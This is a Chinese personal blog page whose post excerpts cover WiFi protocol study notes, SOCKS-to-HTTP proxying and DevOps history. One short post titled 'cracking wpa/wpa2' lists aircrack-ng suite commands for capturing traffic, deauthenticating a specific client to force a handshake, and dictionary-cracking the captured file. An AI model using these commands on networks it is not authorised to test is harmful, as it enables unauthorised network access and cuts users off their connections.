分类 默认分类 下的文章

WIFI 协议 读书笔记

PKI: Public Key Infrastructure, 有又称 非对称加密 asymmetric encryption;
PSK: Pre-Shared Key.
MAC: Media Access Control;
WPA: Wi-Fi Protected Access;
TKIP: Temporal Key Integrity Protocol;
MIC: Michael integrity check, TKIP 使用这个 Michael 作为完整性check的方法.
TSC: TKIP sequence, 类似 IV;
TLS/SSL :Transport Layer Security/Secure Sockets Layer;
SSH: Secure Shell;
EAP: extensible authentication protocol;
FCS: frame check sequence, 有很多实现, CRC 32 就是其中一种实现算法;
ICV: Integrity Check Value, MAC 层加密之前后边追加 ICV, 加密之后的 frame 上追加的是 CRC, CRC可以被中间人截获,重算, ICV 不可能, 因为没有被解密, 无法重算;
MSDU: MAC service data unit, IP层传给 MAC 层的数据单元, 可以拆分成多个 MPDU;
MPDU: MAC protocol data unit;
RC4: Rivest Cipher 4, Rivest 设计的第4代加密算法, 加密解密用一个函数.

使用命令行扫描无线访问点:
iwlist wlan0 scanning
sudo iwlist wlan0 scan
使用命令行配置访问点: (iwconfig 相对于ifconfig, 只设置 wireless 相关的接口设置).
iwconfig wlan0 essid "tp_link_89s3sd"
使用命令行设置IP
ifconfig wlan0 192.168.0.2 netmask 255.255.255.0 up
显示路由表 (显示或者操作路由表)
route -n

WEP -> RC4 -> 128 (104 bit key + 24 bit IV) -> 流加密 -> 24 bit IV 明文传输 -> IV reuse.
WEP -> 两种Key -> Default Key[4 keys] 和 Key Mapping Key

WPA -> TKIP -> RC4
RSN -> WPA2 ->

802.3 -> Ethernet -> Hub
802.11 -> WLAN -> AP (Infrastructure)

802.11 -> Infrastructure & ad-hoc mode

802.11 和 WIFI 的关系就是, 一个是理论, 一个是实际实现.

WEP
RSN (WPA + WPA2).

加密算法: 流式加密/块加密
解密方式: 对称加密/非对称加密

WPA2 is used in CCMP (counter with CBC MAC protocol) mode for implementing AES in 802.11i, including:

-128-bit keys;
-Using AES in CBC-MAC mode for calculating MIC and AES in counter mode for data encryption; and
-Guaranteeing 48 bit initialisation vector.

WEP 加密过程:
WEP.png

WEP, WPA, WPA2 对比
wepwpawpa2Diff.jpg

SOCKS 协议转化为 HTTP, HTTPS 协议

SOCKS 代理协议是和 HTTP, HTTP, FTP 代理协议不同的代理协议,尽管你有了 SOCKS 代理服务器,你可以在 chrome 设置 SOCKS 代理服务器就可以上网,但是, 如果你在命令行, 或者其他 app 里面想使用代理, 却不能做到. 有没有一种方法可以让 SOCKS 协议转换成 HTTP, HTTPS 协议呢?

- 阅读剩余部分 -

破解 wpa/wpa2

查看網卡:
ifconfig
ifconfig -a

設置網卡爲monitor 模式
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0

// open monitor
airmon-ng start wlan0

//check all networks
airodump-ng wlan0

// dump data
airodump-ng --ivs -w xiaomi -c 10 wlan0
airodump-ng --ivs -w mm -c 6 --bssid 00:10:18:01:D8:82 wlan0

// make network down and reshake hands
aireplay-ng -0 10 -a 40:16:9F:E0:79:00 -c 80:BE:05:0B:C2:B8 wlan1

//crack
aircrack-ng -w /root/Downloads/dict/123.txt mm-02.ivs

kali linux install links

download:
https://www.kali.org/downloads/

硬盘安装Kali Linux
http://cn.docs.kali.org/installing-kali-linux-cn/%E7%A1%AC%E7%9B%98%E5%AE%89%E8%A3%85kali-linux

[DevOps for Developers] 读书笔记1

dev & ops 分别对change的态度, 决定了...
devOps 是随着agile实践一步步发展而来, agile 先是在开发team, 后延续到ops team. 它强调的是合作, 沟通.

dev: change code, and want to delivery quickly to production;
ops: no change for production, keep it stable;

devops 概念的萌芽发展历程

  1. Patrick Debois coined the term DevOps in 2009 while organizing the
    DevOpsDays conference in Belgium.
  2. Patrick Debois ran a session called “Agile Operations and
    Infrastructure: How Infra-gile Are You?”4 at the Agile 2008
    conference in Toronto and published a paper with a similar name.
  3. Marcel Wegermann published a e-mail list called “Agile System
    Administration.”
  4. John Allspaw gave a presentation called “10+ Deploys per Day: Dev
    and Ops Cooperation”7 at the Velocity 2009 conference in San Jose.
  5. Steven Blank published a book called Four Steps to the Epiphany.
  6. Eric Ries published The Lean Startup9 and others have written on the
    “lean startup” scene.
  7. The 451 Group published the first analyst report on DevOps (titled
    “The Rise of DevOps”10) in September 2010.

DevOps can be examined from the following overlapping perspectives:

  1. Metrics and measurement view: This aspect addresses quality and
    testing and stresses shared incentives.
  2. Process view: This aspect covers congruence and flow to gain fast
    feedback and set up a holistic process.
  3. Technical view: This aspect discusses fast feedback through
    automation, particularly automatic releasing, specification by
    example, and infrastructure as code.